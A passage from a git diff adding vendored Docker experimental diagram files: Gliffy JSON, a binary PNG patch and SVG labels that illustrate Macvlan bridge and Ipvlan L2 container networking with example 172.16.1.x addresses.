","tid":null,"valign":"middle","vposition":"none","hposition":"none"}},"hidden":false,"layerId":"9wom3rMkTrb3"}],"hidden":false,"layerId":"9wom3rMkTrb3"},{"x":224.0,"y":64.19999694824219,"rotation":0.0,"id":262,"width":120.00000000000001,"height":32.0,"uid":"com.gliffy.shape.basic.basic_v1.default.text","order":29,"lockAspectRatio":false,"lockShape":false,"graphic":{"type":"Text","Text":{"overflow":"none","paddingTop":2,"paddingRight":2,"paddingBottom":2,"paddingLeft":2,"outerPaddingTop":6,"outerPaddingRight":6,"outerPaddingBottom":2,"outerPaddingLeft":6,"type":"fixed","lineTValue":null,"linePerpValue":null,"cardinalityType":null,"html":"

Network Gateway

172.16.1.1/24

","tid":null,"valign":"middle","vposition":"none","hposition":"none"}},"linkMap":[],"hidden":false,"layerId":"9wom3rMkTrb3"},{"x":0.0,"y":307.5,"rotation":0.0,"id":282,"width":541.0,"height":36.0,"uid":"com.gliffy.shape.basic.basic_v1.default.text","order":30,"lockAspectRatio":false,"lockShape":false,"graphic":{"type":"Text","Text":{"overflow":"none","paddingTop":2,"paddingRight":2,"paddingBottom":2,"paddingLeft":2,"outerPaddingTop":6,"outerPaddingRight":6,"outerPaddingBottom":2,"outerPaddingLeft":6,"type":"fixed","lineTValue":null,"linePerpValue":null,"cardinalityType":null,"html":"

Containers Attached Directly to Parent Interface. No Bridge Used (Docker0)

","tid":null,"valign":"middle","vposition":"none","hposition":"none"}},"linkMap":[],"hidden":false,"layerId":"9wom3rMkTrb3"}],"layers":[{"guid":"9wom3rMkTrb3","order":0,"name":"Layer 0","active":true,"locked":false,"visible":true,"nodeIndex":32}],"shapeStyles":{},"lineStyles":{"global":{"fill":"none","stroke":"#000000","strokeWidth":1,"orthoMode":2}},"textStyles":{"global":{"italic":true,"face":"Arial","size":"20px","color":"#000000","bold":false}}},"metadata":{"title":"untitled","revision":0,"exportBorder":false,"loadPosition":"default","libraries":["com.gliffy.libraries.basic.basic_v1.default","com.gliffy.libraries.flowchart.flowchart_v1.default","com.gliffy.libraries.swimlanes.swimlanes_v1.default","com.gliffy.libraries.images","com.gliffy.libraries.network.network_v4.home","com.gliffy.libraries.network.network_v4.business","com.gliffy.libraries.network.network_v4.rack","com.gliffy.libraries.network.network_v3.home","com.gliffy.libraries.network.network_v3.business","com.gliffy.libraries.network.network_v3.rack"],"lastSerialized":1458124258706,"analyticsProduct":"Confluence"},"embeddedResources":{"index":0,"resources":[]}} \ No newline at end of file diff --git a/vendor/github.com/docker/docker/experimental/images/macvlan-bridge-ipvlan-l2.png b/vendor/github.com/docker/docker/experimental/images/macvlan-bridge-ipvlan-l2.png new file mode 100644 index 0000000000000000000000000000000000000000..13aa4f212d9db346f307dfbe111fd657406bb943 GIT binary patch literal 14527 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 #1eth0172.16.1.10/24Container #2eth0172.16.1.11/24DockerHost #1Container #3eth0172.16.1.12/24Container #4eth0172.16.1.13/24DockerHost #2(Host)eth0172.16.1.253/24(IPOptional)(Host)eth0172.16.1.254/24(IPOptional)NetworkGateway172.16.1.1/24ContainersAttachedDirectlytoParentInterface.NoBridgeUsed (Docker0)MacvlanBridgeMode &IpvlanL2Mode \ No newline at end of file diff --git a/vendor/github.com/docker/docker/experimental/images/multi_tenant_8021q_vlans.gliffy b/vendor/github.com/docker/docker/experimental/images/multi_tenant_8021q_vlans.gliffy new file mode 100644 index 0000000000..40eed17270 --- /dev/null +++ b/vendor/github.com/docker/docker/experimental/images/multi_tenant_8021q_vlans.gliffy @@ -0,0 +1 @@ +{"contentType":"application/gliffy+json","version":"1.3","stage":{"background":"#ffffff","width":389,"height":213,"nodeIndex":276,"autoFit":true,"exportBorder":false,"gridOn":true,"snapToGrid":false,"drawingGuidesOn":false,"pageBreaksOn":false,"printGridOn":false,"printPaper":"LETTER","printShrinkToFit":false,"printPortrait":true,"maxWidth":5000,"maxHeight":5000,"themeData":null,"viewportType":"default","fitBB":{"min":{"x":5,"y":6.6999969482421875},"max":{"x":389,"y":212.14285409109937}},"printModel":{"pageSize":"a4","portrait":false,"fitToOnePage":false,"displayPageBreaks":false},"objects":[{"x":64.0,"y":36.0,"rotation":0.0,"id":216,"width":211.0,"height":31.0,"uid":"com.gliffy.shape.basic.basic_v1.default.line","order":10,"lockAspectRatio":false,"lockShape":false,"graphic":{"type":"Line","Line":{"strokeWidth":5.0,"strokeColor":"#e69138","fillColor":"none","dashStyle":null,"startArrow":0,"endArrow":0,"startArrowRotation":"auto","endArrowRotation":"auto","interpolationType":"linear","cornerRadius":10.0,"controlPath":[[-12.0,33.0],[84.0,33.0],[84.0,86.0],[120.0,86.0]],"lockSegments":{"1":true},"ortho":true}},"linkMap":[],"hidden":false,"layerId":"9wom3rMkTrb3"},{"x":190.0,"y":32.0,"rotation":0.0,"id":254,"width":211.0,"height":31.0,"uid":"com.gliffy.shape.basic.basic_v1.default.line","order":11,"lockAspectRatio":false,"lockShape":false,"graphic":{"type":"Line","Line":{"strokeWidth":5.0,"strokeColor":"#f1c232","fillColor":"none","dashStyle":null,"startArrow":0,"endArrow":0,"startArrowRotation":"auto","endArrowRotation":"auto","interpolationType":"linear","cornerRadius":10.0,"controlPath":[[-142.0,16.0],[54.0,16.0],[54.0,115.0],[87.0,115.0]],"lockSegments":{"1":true},"ortho":true}},"linkMap":[],"children":[],"hidden":false,"layerId":"9wom3rMkTrb3"},{"x":133.38636363636374,"y":108.14285409109937,"rotation":0.0,"id":226,"width":123.00000000000001,"height":104.0,"uid":"com.gliffy.shape.iphone.iphone_ios7.icons_glyphs.glyph_cloud","order":12,"lockAspectRatio":false,"lockShape":false,"graphic":{"type":"Shape","Shape":{"tid":"com.gliffy.stencil.iphone.iphone_ios7.icons_glyphs.glyph_cloud","strokeWidth":1.0,"strokeColor":"#000000","fillColor":"#999999","gradient":false,"dashStyle":null,"dropShadow":false,"state":0,"opacity":1.0,"shadowX":0.0,"shadowY":0.0}},"linkMap":[],"children":[],"hidden":false,"layerId":"9wom3rMkTrb3"},{"x":15.147567221510933,"y":139.96785409109907,"rotation":0.0,"id":115,"width":107.40845070422536,"height":49.0,"uid":"com.gliffy.shape.basic.basic_v1.default.group","order":29,"lockAspectRatio":false,"lockShape":false,"children":[{"x":31.506478873239438,"y":2.4460032626429853,"rotation":0.0,"id":116,"width":44.395492957746484,"height":29.54388254486117,"uid":"com.gliffy.shape.basic.basic_v1.default.group","order":17,"lockAspectRatio":false,"lockShape":false,"children":[{"x":20.86588169014084,"y":2.637846655791175,"rotation":0.0,"id":117,"width":2.663729577464789,"height":24.268189233278818,"uid":"com.gliffy.shape.basic.basic_v1.default.line","order":26,"lockAspectRatio":false,"lockShape":false,"constraints":{"constraints":[],"startConstraint":{"type":"StartPositionConstraint","StartPositionConstraint":{"nodeId":120,"py":0.0,"px":0.5}},"endConstraint":{"type":"EndPositionConstraint","EndPositionConstraint":{"nodeId":120,"py":1.0,"px":0.5}}},"graphic":{"type":"Line","Line":{"strokeWidth":2.0,"strokeColor":"#0b5394","fillColor":"none","dashStyle":null,"startArrow":0,"endArrow":0,"startArrowRotation":"auto","endArrowRotation":"auto","interpolationType":"linear","cornerRadius":null,"controlPath":[[1.3318647887324033,-1.055138662316466],[1.3318647887324033,25.3233278955953]],"lockSegments":{},"ortho":false}},"linkMap":[],"hidden":false,"layerId":"9wom3rMkTrb3"},{"x":36.84825915492961,"y":2.637846655791175,"rotation":0.0,"id":118,"width":1.0000000000000002,"height":25.323327895595277,"uid":"com.gliffy.shape.basic.basic_v1.default.line","order":